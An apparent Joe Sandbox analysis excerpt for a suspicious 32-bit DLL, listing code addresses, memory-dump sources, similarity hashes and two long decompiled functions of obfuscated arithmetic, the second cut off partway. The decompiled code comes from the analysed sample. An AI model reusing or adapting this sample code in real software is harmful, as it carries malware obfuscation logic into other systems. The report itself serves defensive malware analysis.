            0x6d5117fb
            0x6d511805
            0x6d511807
            0x6d511841
            0x6d511809
            0x6d51180e
            0x6d511832
            0x6d51183a
            0x6d51182e
            0x6d51182e
            0x6d511844
            0x6d51184b
            0x6d51184d
            0x6d51186f
            0x6d511877
            0x6d51187a
            0x6d51187a
            0x6d51187c
            0x6d51187c
            0x6d511887
            0x6d51188d
            0x6d511892
            0x6d511899
            0x6d5118d3
            0x6d5118de
            0x6d5118e4
            0x6d5118e7
            0x6d5118ea
            0x6d5118f6
            0x6d5118fe
            0x6d51189b
            0x6d51189e
            0x6d5118aa
            0x6d5118b0
            0x6d5118b6
            0x6d5118b9
            0x6d5118c2
            0x6d5118c2
            0x6d511901
            0x6d51190f
            0x6d511915
            0x6d51191c
            0x6d51191e
            0x6d51191e
            0x6d511925
            0x6d511927
            0x6d511927
            0x6d51192e
            0x6d511930
            0x6d511930
            0x6d511937
            0x6d511939
            0x6d511939
            0x6d511940
            0x6d511942
            0x6d511942
            0x6d51194f
            0x6d511952
            0x6d511989
            0x6d511954
            0x6d511954
            0x6d511957
            0x6d511982
            0x6d511977
            0x6d511977
            0x6d51198b
            0x6d511993
            0x6d511996
            0x6d5119b5
            0x6d5119ba
            0x6d5119ba
            0x6d5119bc
            0x6d5119c1
            0x6d5119cd
            0x6d5119c3
            0x6d5119c6
            0x6d5119c6
            0x6d5119d2
            0x6d5119d2
            0x6d511998
            0x6d51199b
            0x6d5119aa
            0x00000000
            0x6d5119aa
            0x6d51199d
            0x6d5119a0
            0x6d5119a2
            0x6d5119a2
            0x00000000
            0x6d5119a0
            0x6d511959
            0x6d51195c
            0x6d511972
            0x00000000
            0x6d511972
            0x6d511961
            0x6d511963
            0x6d511963
            0x6d511961
            0x00000000
            0x6d511952
            0x6d511854
            0x6d511862
            0x6d51186a
            0x00000000
            0x6d51186a
            0x6d511858
            0x6d51185d
            0x6d51185d
            0x00000000
            0x6d511858
            0x6d511815
            0x6d511823
            0x6d51182b
            0x00000000
            0x6d51182b
            0x6d511819
            0x6d51181e
            0x6d51181e
            0x6d511819

            APIs
            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6D5116DD,?,?,00000008,?,?,6D50F598,00000000), ref: 6D51190F
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: ExceptionRaise
            • String ID:
            • API String ID: 3997070919-0
            • Opcode ID: ff6518660b2e045983b142c6f955f88f6d8a207a7adf982967d18bbf3b1719d2
            • Instruction ID: 12408121cb01604f07c0ae08abca6daa442aca77c5bed3280d7d98e17bcf7b40
            • Opcode Fuzzy Hash: ff6518660b2e045983b142c6f955f88f6d8a207a7adf982967d18bbf3b1719d2
            • Instruction Fuzzy Hash: 55B15E356146099FE709CF28C886F647BE0FF55364F25CA98E8A9CF6A1C735D982CB40
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D503162 Relevance: 1.6, Strings: 1, Instructions: 355COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 94%
            			E6D503162() {
				signed char _t261;
				signed int _t268;
				signed int _t269;
				signed int _t271;
				signed int _t278;
				signed int _t279;
				signed short _t280;
				signed short _t281;
				intOrPtr _t293;
				signed short _t299;
				signed short _t300;
				signed int _t305;
				signed int _t315;
				signed int _t316;
				intOrPtr _t322;
				void* _t327;
				signed int _t345;
				signed int _t349;
				signed int _t350;
				signed int _t354;
				intOrPtr _t363;
				short _t376;
				signed int _t377;
				signed short _t380;
				signed short _t381;
				intOrPtr _t385;
				intOrPtr _t387;
				signed int _t388;
				signed int _t389;
				signed int _t393;
				signed int _t395;
				signed short _t396;
				signed short _t397;
				signed int _t403;
				signed int _t405;
				signed short _t408;
				signed short _t418;
				signed int _t420;
				signed int _t422;
				signed int _t435;
				signed int _t436;
				signed int _t487;
				void* _t492;
				signed int _t493;
				signed int _t496;
				intOrPtr _t498;
				intOrPtr _t499;
				signed int _t500;
				signed int _t501;
				signed int _t503;
				signed int _t504;
				signed int _t505;
				signed int _t506;
				void* _t507;
				void* _t512;
				void* _t514;
				void* _t516;

				_t261 =  *0x6d55d58a; // 0x0
				 *0x6d55d58a = _t261 + 1;
				_t385 =  *((intOrPtr*)(_t507 + 0x50));
				_t505 =  *(_t507 + 0x4c);
				 *(_t507 + 0x30) = _t261 & 0x000000ff;
				 *(_t507 + 0x4c) = 0xf79 %  *(_t385 + 0x43b4);
				asm("cdq");
				_t393 =  *0x6d55d5a0; // 0x0
				 *(_t507 + 0x20) = _t505 / ( *0x6d55d5c0 & 0x0000ffff);
				 *(_t507 + 0x14) =  *0x6d55d5d0 & 0x0000ffff;
				_t268 =  *0x6d55d5e0; // 0x0
				_t498 =  *0x6d55d5cc; // 0x0
				 *(_t507 + 0x10) = _t505;
				_t506 = _t505 + 1;
				_t499 = _t498 + 1;
				 *(_t507 + 0x18) = _t393 ^ _t268;
				_t395 =  *0x6d55d598; // 0x0
				 *0x6d55d5cc = _t499;
				_t500 = _t499 +  *0x6d55d5d8;
				_t269 = _t268 - 1;
				 *0x6d55d5e0 = _t269;
				 *((intOrPtr*)(_t506 + _t395 * 4)) =  *((intOrPtr*)(0x3ac + _t395 * 4));
				_t271 =  *0x6d55d588; // 0x0
				 *((intOrPtr*)(_t507 + 0x24)) = 0x21a;
				 *(_t507 + 0x1c) = 0xcb3;
				 *(0x21a + _t500 * 4) =  *(0x21a - _t269 + _t500 * 4) ^  !_t271 & 0x00000100;
				_t396 =  *0x6d55d5d0; // 0x0
				_t397 = _t396 + 0xffff;
				 *(_t507 + 0x40) = 0xffff;
				 *0x6d55d5d0 = _t397;
				_t278 =  *0x6d55d580; // 0x0
				_t279 = _t278 ^ ( *0x6d55d5c4 & 0x0000ffff) %  *(_t507 + 0x1c) + (_t397 & 0x0000ffff);
				 *0x6d55d580 = _t279;
				 *(_t507 + 0x1c) = _t279;
				_t280 =  *0x6d55d5c0; // 0x0
				_t281 = _t280 + 1;
				 *(_t507 + 0x28) = 0x1903;
				 *0x6d55d5c0 = _t281;
				_t492 = 0x4fc;
				 *(_t507 + 0x2c) = _t506;
				if( *((intOrPtr*)( *0x6d55d578 * 0xc +  *((intOrPtr*)(_t507 + 0x24)))) < (_t281 & 0x0000ffff) ||  *0x6d55d590 != 0x527) {
					 *0x6d55d5dc =  *0x6d55d5dc | 0x0000001a;
					_t500 = _t500 + 1;
					 *( *(_t507 + 0x1c) +  *(_t507 + 0x10)) = 0x13ce / ( *( *(_t507 + 0x1c) +  *(_t507 + 0x10)) & 0x000000ff);
				} else {
					_t487 =  *(_t507 + 0x14);
					 *(_t507 + 0x4c) =  *((intOrPtr*)(_t487 + 0x3f78)) + 8;
					 *((char*)( *(_t507 + 0x10) +  *(_t507 + 0x1c) * 4)) =  *((intOrPtr*)(_t385 + _t506 * 4));
					_t492 = 0xa88;
					 *0x6d55d580 =  *0x6d55d580 + 1;
					_t506 = _t506 + 1;
					_t376 =  *0x6d55d5a0; // 0x0
					 *((short*)(0x1cb9 + _t500 * 2)) = _t376;
					_t377 =  *0x6d55d598; // 0x0
					 *(_t487 + _t377 * 4) = 0x294f2b7 %  *(_t487 + _t377 * 4);
					_t380 =  *0x6d55d588; // 0x0
					_t381 = _t380 + 0xffff;
					 *0x6d55d588 = _t381;
					 *0x6d55d58c = (_t381 & 0x0000ffff) *  *0x6d55d5d4 %  *0x6d55d58c;
				}
				_t403 =  *0x6d55d5e0; // 0x0
				_t493 = _t492 + 1;
				 *(_t507 + 0x3c) = _t500;
				 *(_t507 + 0x38) = _t500;
				 *(_t507 + 0x34) = _t493;
				 *0x6d55d5e0 = _t403 - 1;
				if( *((intOrPtr*)( *((intOrPtr*)(_t507 + 0x48)) + _t403 * 4)) ==  *((intOrPtr*)( *(_t507 + 0x14) + _t493 * 4))) {
					 *0x6d55d5e4 =  *0x6d55d5e4 + 0xe9;
					 *0x6d55d588 = 0x89a -  *0x6d55d5d4;
				}
				_t501 = _t500 + 1;
				 *0x6d55d57c = 0x1942;
				_t405 =  *0x6d55d5ac; // 0x0
				 *(_t507 + 0x1c) = _t501 << 4;
				_t293 =  *0x6d55d5d8; // 0x0
				asm("cdq");
				_t496 =  *(_t507 + 0x34);
				_t387 =  *((intOrPtr*)(_t507 + 0x50));
				 *((intOrPtr*)( *((intOrPtr*)(_t507 + 0x24)) + _t405 * 4)) = (_t293 + 0xdb7) % 0xd6a /  *( *(_t507 + 0x1c) +  *(_t507 + 0x20) + 0x14) -  *((intOrPtr*)( *((intOrPtr*)(_t507 + 0x24)) + _t405 * 4));
				_t299 =  *0x6d55d5c0; // 0x0
				_t300 = _t299 + 0xffff;
				 *0x6d55d5c0 = _t300;
				_t512 =  *((intOrPtr*)( *(_t507 + 0x2c) + (_t300 & 0x0000ffff) * 4)) -  *0x6d55d5b0; // 0x0
				if(_t512 != 0 ||  *((intOrPtr*)( *(_t507 + 0x14) + _t506 * 4)) > ( *(_t496 * 3 +  *(_t507 + 0x10)) & 0x000000ff)) {
					_t408 =  *0x6d55d59c; // 0x0
					 *0x6d55d5a0 = _t408 & 0x0000ffff;
					_t305 =  *0x6d55d5d4; // 0x0
					 *0x6d55d59c = _t408 + 0x19d7;
					 *(_t387 + _t506 * 4) = ( *((intOrPtr*)(_t387 + _t305 * 4)) -  *0x181e | 0x00000d3c) /  *(_t387 + _t506 * 4);
					return 0xd3c;
				} else {
					_t514 =  *((intOrPtr*)( *(_t507 + 0x1c) + 0x436)) -  *0x6d55d5e0; // 0x0
					if(_t514 < 0 ||  *((intOrPtr*)(_t506 + _t506 + 0x1338)) >= 0x105c) {
						_t315 =  *0x6d55d5d4; // 0x0
						_t503 =  *(_t507 + 0x3c);
						 *((char*)(_t507 + 0x50)) = 0;
						_t316 =  *0x6d55d598; // 0x0
						 *(_t507 + 0x2c) = 0x26ddf97;
						asm("cdq");
						asm("cdq");
						 *(_t503 + _t503 + 0x1cb9) =  *(_t503 + _t503 + 0x1cb9) &  *(0x3ac + _t316 * 4) % ( *(_t315 + _t315 + 0x1cb9) & 0x0000ffff) % ( *( *(_t507 + 0x1c) + _t506) & 0x000000ff);
						_t322 =  *0x6d55d5c8; // 0x0
						asm("cdq");
						 *0x6d55d57c =  *0x6d55d57c +  *(_t322 + _t503 * 4) % 0x131d %  *( *((intOrPtr*)(_t507 + 0x24)) + 0x6b30);
						_t496 = _t496 + 1;
						_t327 = 0x76;
						_t501 = _t503 - 1;
						 *((intOrPtr*)( *(_t507 + 0x4c) + _t496 * 4)) = _t327 -  *((intOrPtr*)( *(_t507 + 0x4c) + _t496 * 4));
						_t418 =  *0x6d55d59c; // 0x0
						 *0x6d55d59c = _t418 +  *(_t507 + 0x40);
						if( *((intOrPtr*)(0x436 + _t501 * 4)) != (_t418 & 0x0000ffff)) {
							_t435 =  *0x6d55d5d4; // 0x0
							_t436 = _t435 - 1;
							 *0x6d55d5d4 = _t436;
							 *((char*)(_t436 +  *(_t507 + 0x10))) = 0xb6 -  *((intOrPtr*)(_t436 +  *(_t507 + 0x10)));
						}
					} else {
						_t516 = ( *(_t501 + _t501 + 0x1cb9) & 0x0000ffff) -  *0x6d55d580; // 0x0
						if(_t516 <= 0) {
							_t501 =  *(_t507 + 0x38);
							 *( *(_t507 + 0x30) + (_t501 + _t501) * 8) =  *( *(_t507 + 0x30) + (_t501 + _t501) * 8) & 0x000013c9;
							 *0x6d55d59c =  *0x6d55d59c +  *(_t387 + 0x375c) / ( *0x34f2 & 0x0000ffff);
							_t363 =  *0x6d55d5b0; // 0x0
							 *((short*)(0x1cb9 + _t496 * 2)) = (_t363 +  *0x6d55d5ac) / ( *(_t496 + _t496 + 0x1cb9) & 0x0000ffff);
							 *0x6d55d578 = ( *((intOrPtr*)( *(_t507 + 0x14) + _t496 * 4)) - _t496 ^ 0x00000afe) *  *0x6d55d578;
						}
					}
					_t420 =  *0x6d55d5c0 & 0x0000ffff;
					if(_t420 <= 0x747) {
						L18:
						_t388 =  *(_t507 + 0x4c) & 0x000000ff;
						if(_t388 !=  *0x3376) {
							L21:
							asm("cdq");
							 *0x6d55d5e0 =  *( *((intOrPtr*)(_t507 + 0x24)) + _t496 * 4) % 0x1eb8 -  *0x6d55d5e0;
							return 0xd3c;
						}
						_t504 = _t501 |  *(_t507 + 0x28);
						_t422 =  *(_t507 + 0x30);
						 *(_t507 + 0x40) = _t496 * 0xc;
						 *(_t507 + 0x4c) = _t504 * _t388;
						 *((intOrPtr*)(_t507 + 0x48)) =  *((intOrPtr*)(_t507 + 0x48)) - _t422;
						 *(_t507 + 0x1c) = _t388 * 0xc +  *(_t507 + 0x2c);
						 *((intOrPtr*)(_t507 + 0x50)) = _t422 + _t388 * 4;
						do {
							 *( *(_t507 + 0x40) +  *(_t507 + 0x20)) = (_t388 - ( *0x6d55d5d0 & 0x0000ffff)) *  *( *(_t507 + 0x40) +  *(_t507 + 0x20));
							 *((short*)(0x1cb9 + _t506 * 2)) = ( *( *((intOrPtr*)(_t507 + 0x48)) +  *((intOrPtr*)(_t507 + 0x50))) & 0x0000ffff) * ( *(_t506 + _t506 + 0x1cb9) & 0x0000ffff);
							 *0x6d55d5dc =  *0x6d55d5dc + ( *0x6d55d5c0 & 0x0000ffff |  *(_t507 + 0x4c));
							 *(_t507 + 0x4c) =  *(_t507 + 0x4c) + _t504;
							 *((char*)(_t388 +  *(_t507 + 0x18))) = 0x88;
							_t345 =  *0x6d55d598; // 0x0
							 *((intOrPtr*)(_t507 + 0x50)) =  *((intOrPtr*)(_t507 + 0x50)) + 4;
							 *(_t507 + 0x1c) =  *(_t507 + 0x1c) + 0xc;
							 *( *(_t507 + 0x1c)) = ((_t345 | _t388) +  *((intOrPtr*)( *((intOrPtr*)(_t507 + 0x50))))) %  *( *(_t507 + 0x1c));
							_t349 =  *0x6d55d57c; // 0x0
							_t350 = _t349 | _t388;
							asm("cdq");
							_t388 = _t388 + 1;
							 *( *(_t507 + 0x18) + _t496) = _t350 / ( *( *(_t507 + 0x18) + _t496) & 0x000000ff);
						} while (_t388 ==  *0x3376);
						goto L21;
					} else {
						_t389 =  *(_t387 + _t501 * 4);
						do {
							_t354 = 0x8e6 / _t389;
							_t420 = _t420 + 1;
							_t389 = _t354;
						} while (_t420 > 0x747);
						 *(_t507 + 0x1c) = _t389;
						 *( *((intOrPtr*)(_t507 + 0x50)) + _t501 * 4) = _t354;
						goto L18;
					}
				}
			}




























































            0x6d503169
            0x6d503175
            0x6d50317f
            0x6d503183
            0x6d503187
            0x6d50319a
            0x6d50319e
            0x6d5031a1
            0x6d5031ac
            0x6d5031b7
            0x6d5031bb
            0x6d5031c2
            0x6d5031c8
            0x6d5031cc
            0x6d5031cd
            0x6d5031ce
            0x6d5031d2
            0x6d5031d8
            0x6d5031de
            0x6d5031e4
            0x6d5031e7
            0x6d5031f3
            0x6d5031f7
            0x6d5031fe
            0x6d503207
            0x6d50320f
            0x6d503217
            0x6d503220
            0x6d503223
            0x6d503237
            0x6d50323e
            0x6d50324a
            0x6d503250
            0x6d503255
            0x6d503259
            0x6d50325f
            0x6d503261
            0x6d503269
            0x6d503272
            0x6d503277
            0x6d50327e
            0x6d50330d
            0x6d50333d
            0x6d503342
            0x6d503290
            0x6d503290
            0x6d5032a4
            0x6d5032ab
            0x6d5032ae
            0x6d5032b3
            0x6d5032b9
            0x6d5032ba
            0x6d5032c0
            0x6d5032c8
            0x6d5032d9
            0x6d5032e0
            0x6d5032e8
            0x6d5032eb
            0x6d503301
            0x6d503301
            0x6d503345
            0x6d50334b
            0x6d503350
            0x6d503354
            0x6d503358
            0x6d503367
            0x6d50336f
            0x6d503371
            0x6d503386
            0x6d503386
            0x6d50338c
            0x6d50338d
            0x6d503399
            0x6d5033a7
            0x6d5033ab
            0x6d5033b9
            0x6d5033cc
            0x6d5033d0
            0x6d5033d7
            0x6d5033df
            0x6d5033e5
            0x6d5033ec
            0x6d5033f8
            0x6d5033fe
            0x6d5036ab
            0x6d5036bc
            0x6d5036c9
            0x6d5036ce
            0x6d5036e5
            0x00000000
            0x6d50341c
            0x6d503426
            0x6d50342c
            0x6d5034be
            0x6d5034c3
            0x6d5034c9
            0x6d5034d6
            0x6d5034db
            0x6d5034ea
            0x6d5034f7
            0x6d5034ff
            0x6d503507
            0x6d50350f
            0x6d503524
            0x6d50352a
            0x6d50352b
            0x6d50352f
            0x6d503530
            0x6d503533
            0x6d503549
            0x6d503552
            0x6d503554
            0x6d503560
            0x6d503561
            0x6d50356a
            0x6d50356a
            0x6d503441
            0x6d503449
            0x6d50344f
            0x6d503455
            0x6d503463
            0x6d50347b
            0x6d503482
            0x6d503497
            0x6d5034b4
            0x6d5034b4
            0x6d50344f
            0x6d50356d
            0x6d50357a
            0x6d50359e
            0x6d50359e
            0x6d5035a9
            0x6d503689
            0x6d503695
            0x6d5036a3
            0x00000000
            0x6d5036a3
            0x6d5035af
            0x6d5035b3
            0x6d5035bf
            0x6d5035c6
            0x6d5035ce
            0x6d5035d2
            0x6d5035d9
            0x6d5035dd
            0x6d5035f4
            0x6d503612
            0x6d503625
            0x6d503634
            0x6d503642
            0x6d503647
            0x6d50364e
            0x6d503659
            0x6d503660
            0x6d503662
            0x6d50366b
            0x6d50366d
            0x6d503678
            0x6d503679
            0x6d503681
            0x00000000
            0x6d50357c
            0x6d50357c
            0x6d50357f
            0x6d503586
            0x6d503588
            0x6d503589
            0x6d50358b
            0x6d503593
            0x6d50359b
            0x00000000
            0x6d50359b
            0x6d50357a

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID: a~Qm
            • API String ID: 0-1813150672
            • Opcode ID: 15ccc18eb52ec282ba229cda087be0df31d87cee4501a5854b14b3e65050042f
            • Instruction ID: 7a6495a27dd2e4117595b3046806a39874f25ad00028d60232d2733172f64e57
            • Opcode Fuzzy Hash: 15ccc18eb52ec282ba229cda087be0df31d87cee4501a5854b14b3e65050042f
            • Instruction Fuzzy Hash: 94F18B766082418FDB19CF19C090A66BBF1FBCA308F11496EE886C7B51D7B4E945CF52
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D517992 Relevance: .8, Instructions: 828COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 77%
            			E6D517992(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int* _a24) {
				signed int _v4;
				signed int _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed short* _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v57;
				signed int _t467;
				signed int _t469;
				signed int _t470;
				signed int _t472;
				signed short _t474;
				intOrPtr _t475;
				signed int _t484;
				signed int _t486;
				signed int _t490;
				signed int _t495;
				signed int _t500;
				signed int _t501;
				signed int _t507;
				intOrPtr _t508;
				signed int _t509;
				signed short _t514;
				signed int _t520;
				signed int _t523;
				signed int _t525;
				signed int _t529;
				intOrPtr _t536;
				signed short _t537;
				signed int _t541;
				signed int _t542;
				signed short _t548;
				signed short _t549;
				signed int _t554;
				signed int _t555;
				intOrPtr _t562;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed short _t575;
				signed int _t580;
				intOrPtr _t583;
				signed int _t584;
				signed int _t589;
				intOrPtr _t592;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed short _t612;
				signed short _t613;
				signed int _t614;
				intOrPtr _t617;
				intOrPtr _t619;
				signed int _t622;
				signed int _t624;
				signed int _t627;
				signed int _t629;
				signed int _t631;
				signed int _t635;
				signed int _t640;
				signed int _t642;
				signed int _t643;
				signed int _t654;
				intOrPtr _t656;
				signed int _t664;
				intOrPtr _t666;
				intOrPtr _t668;
				signed int _t669;
				signed int _t674;
				signed int _t681;
				signed int _t683;
				signed int _t684;
				signed int _t687;
				signed int _t695;
				intOrPtr _t696;
				signed short _t697;
				signed short _t698;
				intOrPtr _t700;
				signed int _t701;
				signed int _t702;
				signed int _t705;
				signed int* _t715;
				intOrPtr* _t717;
				signed int _t718;
				signed int _t720;
				signed int _t721;
				signed short _t724;
				signed int* _t728;
				intOrPtr _t730;
				signed char _t732;
				signed char _t733;
				signed short _t735;
				signed short _t736;
				signed int _t737;
				intOrPtr _t745;
				signed short _t748;
				intOrPtr _t753;
				signed int _t754;
				signed int _t757;
				signed int _t758;
				signed int _t759;
				signed int _t760;
				signed int _t761;
				signed int _t763;
				signed char _t765;
				signed int _t767;
				signed short _t769;
				signed int _t773;
				signed int _t774;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed short _t780;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed short _t788;
				intOrPtr _t790;
				signed short* _t791;
				signed int _t792;
				signed int* _t799;
				intOrPtr _t801;
				signed int _t802;
				signed int _t803;
				signed int _t806;
				signed int _t807;
				signed int _t809;
				signed int _t813;
				signed int _t819;
				intOrPtr _t825;
				signed int _t830;
				signed int _t835;
				intOrPtr _t844;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t859;
				signed short _t862;
				signed short _t869;
				signed short _t870;
				signed int _t887;
				signed char _t888;
				signed int _t906;
				signed int _t907;
				signed int _t913;
				signed int _t925;
				signed int _t926;
				signed int _t930;
				signed short _t931;
				signed short _t932;
				signed int _t940;
				signed short* _t946;
				signed int* _t950;
				signed int _t952;
				intOrPtr* _t953;
				signed int _t958;
				signed int _t965;
				signed int _t967;
				signed int _t972;
				signed int _t977;
				intOrPtr _t979;
				signed int _t980;
				signed int _t981;
				signed int _t982;
				signed int _t984;
				signed int _t985;
				signed int _t987;
				signed int _t988;
				signed int _t989;
				intOrPtr _t990;
				signed int _t992;
				signed int _t997;
				signed int* _t1001;
				signed int* _t1002;
				void* _t1012;
				void* _t1013;
				void* _t1014;
				void* _t1017;

				_t715 = _a24;
				_t967 =  *0x6d55d58c; // 0x0
				_v52 = _t967;
				_v48 =  *((intOrPtr*)(_a20 +  *_t715 * 4));
				_t467 =  *0x6d55d5e0; // 0x0
				_t745 =  *0x6d55d5a8; // 0x0
				_v20 = _t467 ^  *0x6d55d57c;
				_t469 =  *0x6d55d5d4; // 0x0
				_v40 = _t469;
				_t470 =  *0x6d55d5ac; // 0x0
				_push(0x1bdb);
				_v36 =  *(_t745 + _t470 * 4) * 0x1492;
				_t472 =  *0x6d55d578; // 0x0
				asm("cdq");
				_t474 = _t472 %  *0x6d55d57c & 0x0000ffff;
				_t844 =  *0x6d55d594; // 0x0
				_v56 = _t474;
				_v4 = _t474 & 0x0000ffff;
				_t475 =  *0x6d55d5c8; // 0x0
				_v16 = _t474 & 0x0000ffff;
				_t748 =  *0x6d55d59c; // 0x0
				_v32 =  *((intOrPtr*)(_t475 + 0x251c));
				_v24 =  *((intOrPtr*)((_t748 & 0x0000ffff) * 0xc + _t844));
				 *0x6d55d59c = _t748 + 0xffff;
				_v12 =  *((intOrPtr*)(_t844 + (_v40 + _v40) * 8));
				_t484 =  *0x6d55d574; // 0x0
				_v44 = _t484;
				_t486 =  *0x6d55d598; // 0x0
				_v57 =  *((intOrPtr*)(_a4 + 0x3148));
				 *0x6d55d598 = _t486 - 1;
				_t490 =  *0x6d55d5e0; // 0x0
				_t753 =  *0x6d55d5bc; // 0x0
				_t754 = _a12;
				 *0x6d55d5e0 = _t490 - 1;
				_a12 = _t754 + 1;
				_push(_t754);
				_t757 = _v48 & 0x000000ff;
				_push(0x16f9 - _t757);
				_push(0x5e);
				_push(_t490);
				_push( *((intOrPtr*)(_t753 + ( *0x6d55d588 & 0x0000ffff) * 4)));
				_push(_t757);
				_push(( *(_t967 + _t490 * 4) & 0x000000ff) * 0x1d9a);
				_push(0x163b /  *( *0x6d55d580 * 0xc + _a8));
				_push(0xb5d);
				_push(0);
				_push(_t715[_t486]);
				_t495 = E6D515CA6();
				_t758 =  *0x6d55d5e0; // 0x0
				_t1013 = _t1012 + 0x30;
				_t1001 = _a24;
				_t717 = _v12;
				_t969 = _v44;
				_t1001[_t758] = _t495;
				 *_t717 =  *_t717 + 1;
				_t759 =  *0x6d55d57c; // 0x0
				 *(_v44 + _t759 * 4) =  *(_v44 + _t759 * 4) ^  *0x6d55d5d0 & 0x0000ffff;
				_t760 =  *_t1001;
				_t850 = _v56 + 0xffff;
				_v56 = _v56 + 0xffff;
				_t1017 = ( *(_t760 + _a16 + 6) & 0x000000ff) -  *0x6d55d5b8; // 0x0
				if(_t1017 != 0) {
					_t500 =  *0x6d55d598; // 0x0
					_t946 = _v32;
					_v28 = _t500;
					_t501 = _t500 * 6;
					__eflags = ( *(_t946 + _t501) & 0x0000ffff) -  *((intOrPtr*)(_t717 + 0x9e4));
					if(( *(_t946 + _t501) & 0x0000ffff) <=  *((intOrPtr*)(_t717 + 0x9e4))) {
						L31:
						_t851 = _v20;
						 *_t946 =  *_t946 + 0xffff;
						_t761 =  *_t946 & 0x0000ffff;
						_t459 = _t851 + 0x14 + _t761 * 4;
						 *_t459 =  *(_t851 + 0x14 + _t761 * 4) ^ (_v4 & 0x0000ffff | 0x00001387);
						__eflags =  *_t459;
					} else {
						_t508 =  *0x6d55d594; // 0x0
						__eflags =  *((intOrPtr*)(_t508 + _t760 * 4)) - 0x1bd2;
						if( *((intOrPtr*)(_t508 + _t760 * 4)) <= 0x1bd2) {
							goto L31;
						} else {
							_t509 =  *0x6d55d578; // 0x0
							_t763 =  *_t717 +  *_t717;
							_t852 = _v52;
							__eflags =  *((intOrPtr*)(_t1001 + 8 + _t763 * 8)) - ( *(_t509 + _t852) & 0x000000ff);
							if( *((intOrPtr*)(_t1001 + 8 + _t763 * 8)) > ( *(_t509 + _t852) & 0x000000ff)) {
								L8:
								_t853 = _v56 & 0x0000ffff;
								_t765 =  *0x6d55d584; // 0x0
								_t972 = ( *(_v20 + _t853 * 4) & 0x000000ff) * (_t765 & 0x000000ff);
								_v48 = _t972;
								 *0x6d55d584 = _t765 - 1;
								_t767 =  *0x6d55d5d4; // 0x0
								_v48 = _t972 -  *((intOrPtr*)(_v36 + 0x306));
								_t514 =  *0x6d55d588; // 0x0
								 *(_t853 * 0xc + _a4) = (_t514 -  *((intOrPtr*)(_t717 + 0x7820)) & 0x000014a7) / ( *(_t767 + _v52) & 0x000000ff) /  *(_t853 * 0xc + _a4);
								 *0x6d55d588 =  *0x6d55d588 + 1;
								_t976 =  *0x6d55d5e0; // 0x0
								_t769 = _v16 & 0x0000ffff;
								_t520 =  *0x6d55d598; // 0x0
								_v56 = _t769;
								_v28 = _t520;
								goto L10;
							} else {
								_t997 =  *0x6d55d5e0; // 0x0
								_t976 = _t997 - 1;
								 *0x6d55d5e0 = _t997 - 1;
								__eflags =  *((intOrPtr*)(_t717 + 8 + _t997 * 4)) - (_v40 & 0x000000ff);
								if( *((intOrPtr*)(_t717 + 8 + _t997 * 4)) > (_v40 & 0x000000ff)) {
									goto L8;
								} else {
									_t687 =  *_t1001 * 3;
									_t825 = _a16;
									__eflags =  *((char*)(_t687 + _t825)) - 0x41;
									if( *((char*)(_t687 + _t825)) <= 0x41) {
										_t769 = _v56;
										L10:
										_t718 =  *0x6d55d5d4; // 0x0
										_t859 =  *((intOrPtr*)(_t1001 + 0xc + (_t718 + _t718) * 8));
										_t523 = _v52;
										_v16 = _t859;
										__eflags = _t859 - ( *(_t523 + 0x16f1) & 0x000000ff);
										if(_t859 == ( *(_t523 + 0x16f1) & 0x000000ff)) {
											_t669 = _t769 & 0x0000ffff;
											_t819 = _t669 * 6;
											__eflags = _t819;
											_v28 = _t669;
											_v8 = _v40 & 0x000000ff;
											_v4 = _t819;
											while(1) {
												_t925 =  *0x6d55d57c; // 0x0
												_t674 =  *0x6d55d5d4; // 0x0
												 *0x6d55d5d4 = _t674 - 1;
												_t926 = _t925 - 1;
												_push(_t926);
												 *0x6d55d57c = _t926;
